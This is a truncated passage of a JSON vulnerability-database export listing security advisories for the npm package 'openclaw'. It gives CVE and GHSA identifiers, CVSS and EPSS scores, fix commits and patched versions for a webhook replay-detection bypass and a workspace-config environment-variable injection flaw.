lnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41380","GHSA-p4x4-2r7f-wjxg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jbwa-scg3-efeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89491?format=json","vulnerability_id":"VCID-jdqk-kv8u-xqa9","summary":"OpenClaw: Telnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding\n## Summary\nTelnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 replay hashing treated equivalent Telnyx Base64/Base64URL signatures as distinct requests, but signature verification still held, so lower to low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `ad77666054651c1fd77b1dc60fd6a8db6600a29a` — 2026-03-30T20:01:43+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41351","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.1326","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13224","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13264","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41351"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ad77666054651c1fd77b1dc60fd6a8db6600a29a","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ad77666054651c1fd77b1dc60fd6a8db6600a29a"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-37v6-fxx8-xjmx","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-37v6-fxx8-xjmx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41351","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41351"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-detection-bypass-via-base64-signature-re-encoding","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-detection-bypass-via-base64-signature-re-encoding"},{"reference_url":"https://github.com/advisories/GHSA-37v6-fxx8-xjmx","reference_id":"GHSA-37v6-fxx8-xjmx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-37v6-fxx8-xjmx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41351","GHSA-37v6-fxx8-xjmx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jdqk-kv8u-xqa9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89392?format=json","vulnerability_id":"VCID-jhah-j2td-t3dp","summary":"OpenClaw Has Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config\n## Summary\nIncomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real shipped malicious-workspace-config env injection in the CLI backend runner, fixed by sanitizing backend env before spawn and shipped in v2026.3.24, so advisory stays open until published.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.23-2`\n- Patched versions: `>= 2026.3.24`\n- First stable tag containing the fix: `v2026.3.24`\n\n## Fix Commit(s)\n- `c2fb7f1948c3226732a630256b5179a60664ec24` — 2026-03-24T12:58:10-07:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.24`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @YLChen-007 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41384","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03582","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03589","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03575","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41384"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c2fb7f1948c3226732a630256b5179a60664ec24","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c2fb7f1948c3226732a630256b5179a60664ec24"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfw7-6rhc-6xxg","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfw7-6rhc-6xxg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41384","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41384"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-config-in-cli-backend","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-config-in-cli-backend"},{"reference_url":"https://github.com/advisories/GHSA-vfw7-6rhc-6xxg","reference_id":"GHSA-vfw7-6rhc-6xxg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vfw7-6rhc-6xxg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kc